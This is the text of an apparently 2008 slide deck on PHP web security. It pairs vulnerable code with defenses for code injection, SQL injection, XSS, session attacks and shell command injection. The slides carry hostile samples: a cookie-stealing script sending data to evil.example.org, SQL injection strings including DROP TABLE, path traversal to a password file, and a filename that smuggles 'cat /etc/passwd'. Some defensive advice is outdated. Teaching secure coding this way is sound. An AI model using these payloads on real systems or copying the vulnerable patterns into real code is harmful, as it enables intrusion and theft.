5. 5
Fact : 1
PHP Mainly for
Web Programs
Fact : 2
Easy To Learn
6. 6
PHP: 20,917,850 domains,
1,224,183 IP addresses
Fact : 3
Fact : 4
More Flexible Functions
7. 7
Few Named threats
Code Injection
SQL Injection
Cross Site Script (XSS)
Session Hijacking
Session Fixation
Temp Files abuse
Remote Execution
More and More unNamed threats...
9. Code Injection
9
Dont directly pass the filenames
$filename = $_REQUEST['message'];
$message = file_get_contents($filename);
print $message;
This is ok:
http://example.com/myscript.php?message=hello.txt
But what if I do like this?:
http://example.com/myscript.php?message=passwords.txt
10. Code Injection
10
This is especially important for includes, require
and require_once
$module = $_REQUEST['module'];
include(“lib/$module”);
This is ok:
http://example.com/cms?module=login.php
But what if I do like this?:
http://example.com/cms?module=../passwords.ini
11. Defense Code Injection
11
Make sure the value is one
you expected, if not...ERROR!
$requestedModule = $_REQUEST['module'];
switch($requestedModule)
{
case “login”:
$module = “login”; break;
case “logout”:
$module = “logout”; break;
default:
$module = “error”;
}
13. 13
Form to user search ....
$username=$_POST['username'];
$query= "SELECT * FROM users WHERE name = ' “ .$username." ' ;"
If i give ,
$username a'
or 't'='t
Query will be ,
"SELECT * FROM users WHERE name = ' a' or 't'='t ';"
SQL Injection
14. 14
If i give ,
$username a';
DROP TABLE users; SELECT * FROM data WHERE name
LIKE '%
Query will be ,
SELECT * FROM users WHERE name = ' a';DROP TABLE users; SELECT *
FROM data WHERE name LIKE '% ';
SQL Injection
15. 15
Use single quotation
eg: "select * from users where user= '.$username.'"
Check types of user submitted values
is_bool(), is_float(), is_numeric(), is_string(), is_int() ,
intval() , settype() ,strlen()
eg: strpos($query , ';')
Escape every questionable character in your query
' " , ; ( ) and keywords "FROM", "LIKE", and "WHERE"
mysql_real_escape_string
SQL Injection
Defense
16. 16
magic_quotes_gpc (default – on ) (deprecation – php 6.0)
If Off use
addslashes
If On , If you don't need
stripslashes
if (get_magic_quotes_gpc()){
$_GET = array_map('stripslashes', $_GET);
$_POST = array_map('stripslashes', $_POST);
$_COOKIE = array_map('stripslashes', $_COOKIE);
}
SQL Injection
Defense
17. 17
Mysql Improved Extension
$query=mysqli_prepare($connection_string, "select * from user where user= ?");
mysqli_stmt_bind_param($query,"s",$username);
mysqli_stmt_execute($query);
sstring
iinteger
ddouble
bbinary
PEAR DB,
DataObject
SQL Injection
Defense
19. 19
1.) Inserting scripts
<script>
document.location =
'http://evil.example.org/steal_cookies.php?cookies=' +
document.cookie
</script>
2.) Login
3.) Set Cookies
4.) Executes the scripts
XSS
5.) Steals the cookies
20. 20
Remote control of the client browser
Reveal the value of a cookie
Change links on the page
Redirect to another URI
Render a bogus form
or
Any undesirable action ...
XSS
21. Defense
XSS Encode HTML Entities in All NonHTML
Output
21
htmlentities()
Eg:
$str = "A 'quote' is <b>bold</b>";
echo htmlentities($str);
Outputs Will be >
A 'quote' is <b>bold</b>
Check the image upload URI (avatar, icon)
parse_url
Eg:
<img src=”http://shopping.example.com/addCart.php?item=123”/>
Show the domain name for User submitted Links
eg.
Not safe >
Hey click this to see my photo <a href=”http://badguys.net”>Bala</a>
safe >
Hey click this to see my photo [badguys.net] Bala
24. 24
Victim
Attacker
Web Server
Session ID= AD238723FD32
Session Hijacking
25. 25
Victim
Attacker
Web Server
Session ID= AD238723FD32
Session ID=
AD238723FD32
Session Hijacking
26. Session Hijacking
26
Network Eavesdropping Promiscuous
Mode
If Intranet ?
Use Switch rather than a Hub
If wifi
?
WEP Weired
Equivalent Privacy
If Internet ?
SSL
27. 27
Session Hijacking
Unwitting Exposure
Sending links
See this item http://
store.com/items.php?item=0987
it's O.K , if i send like this,
http://store.com/items.php?item=0987&phpsessid=34223
How to Avoid ?
session.use_trans_sid (turned off by default)
session.use_only_cookies (Defaults to 1 (enabled) since PHP 6.0.)
28. 28
2.) If he clicks, http://unsafesite?SID=3423 3. Shows login page
Victim
Session Fixation
Attacker
Web Server
1.) See this link
http://unsafesite?SID=3423
Set SessionID =3423
session_id($_GET['SID'])
4.) Now Full Access
http://unsafesite?SID=3423
29. 29
Session Hijacking Defense
Use SSL.
Use Cookies Instead of $_GET Variables.
(ini_set ('session.use_only_cookies',TRUE);
ini_set ('session.use_trans_sid',FALSE);
Use Session Timeouts
ini_set('session.cookie_lifetime',1200)
ini_set('session.gc_maxlifetime)
Regenerate IDs for Users with Changed Status
session_regenerate_id
31. Remote Execution
31
Injection of Shell commands
<?php
$filename=$_GET['filename'];
$command='/usr/bin/wc $filename”;
$words=shell_exec ($command);
print “$filename contains $words words.”;
?>
This is ok ...
wordcount.php?filename=textfile.txt
But, What if i give like this ...
wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd
(filename >
/dev/null | cat /etc/passwd )
/usr/bin/wc /dev/null |cat /etc/passwd
32. Remote Execution
32
Defense
Allow only Trusted , Human Users to Import Code
Store uploads outside of Web Document Root
Limit allowable filename extensions for upload
Use disable_functions directive
eg:
disable_functions= “eval,phpinfo”
Do not include PHP scripts from Remote Servers
eg:
<?php
include ('http://example.net/code/common.php')
?>
Properly escape all shell commands
escapeshellarg() , escapeshellcmd()
33. 33
Future? PHP
6.0
Deprecation
Register Globals
Big security hole
Safe Mode
False sense of security
Magic Quotes
Messed with the data
Upcoming changes and features
http://www.php.net/~derick/meetingnotes.
html
http://www.phphacks.com/content/view/49/33/
Rasmus Lerdorf – PHP 6.0 Wish List
http://news.php.net/php.internals/17883
34. 34
What to do?
Proper Input Validation
Dont do Programming + Security
Do secure Programming
htmlentities, mysql_real_escape_string,
parse_url , addslashes ,escapeshellarg,
escapeshellcmd... etc
SSL
Use PEAR , PECL
36. 36
Reference
Pro PHP Security
Chris Snyder , Michael Southwell
http://wikipedia.org/
http://www.sitepoint.com/article/phpsecurityblunders
http://phpsec.org/
WWW.google.com
39. Copyright (c) 2008
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.2
or any later version published by the Free Software Foundation.
http://www.gnu.org/copyleft/fdl.html